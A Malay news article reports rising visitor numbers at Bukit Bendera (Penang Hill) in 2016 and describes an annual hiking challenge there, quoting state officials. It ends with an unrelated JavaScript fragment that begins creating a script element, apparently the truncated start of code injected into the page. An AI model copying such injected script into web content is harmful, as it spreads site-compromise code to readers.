Aktiviti mendaki mampu promosi Bukit Bendera

LOKASI EKO-PELANCONGAN NEGERI... Jumlah pengunjung ke pusat peranginan terkenal negeri, Bukit Bendera pada tempoh tujuh bulan pertama tahun 2016 mencatatkan 339,683 orang berbanding tempoh sama tahun lalu, 212,100 (orang), iaitu peningkatan sebanyak 60 peratus.

Perangkaan tersebut diumumkan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng pada penganjuran cabaran mendaki tahunan, Penang Hill Heritage Forest Challenge 2016 anjuran Perbadanan Bukit Bendera (PHC) bersamasama Penang Amateur Athletic Association dan Persatuan Penduduk-Penduduk Bukit Bendera baru-baru ini.

Menurut beliau, Penang Hill Heritage Forest Challenge 2016 disertai 550 peserta membuktikan bahawa sukan lasak tersebut berpotensi dimajukan sebagai aktiviti tarikan pelancong, sama ada pelancong tempatan mahupun luar negara.

“Penganjuran cabaran mendaki seperti ini perlu diadakan lebih kerap bagi menarik kunjungan lebih ramai pelancong ke Bukit Bendera dan pada masa sama, menggalakkan orang ramai untuk menjadikan aktiviti mendaki sebagai pilihan untuk berekreasi pada setiap hujung minggu,’’ katanya di sini.

Hadir sama, Ahli Parlimen Bukit Bendera, Zairil Khir Johari, Pemangku Pengurus Besar PHC, Dato’ Ng Wee Kok, wakil-wakil Persatuan penduduk-penduduk Bukit Bendera serta Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) Bukit Bendera.

var d=document;var s=d.createElement(‘script’);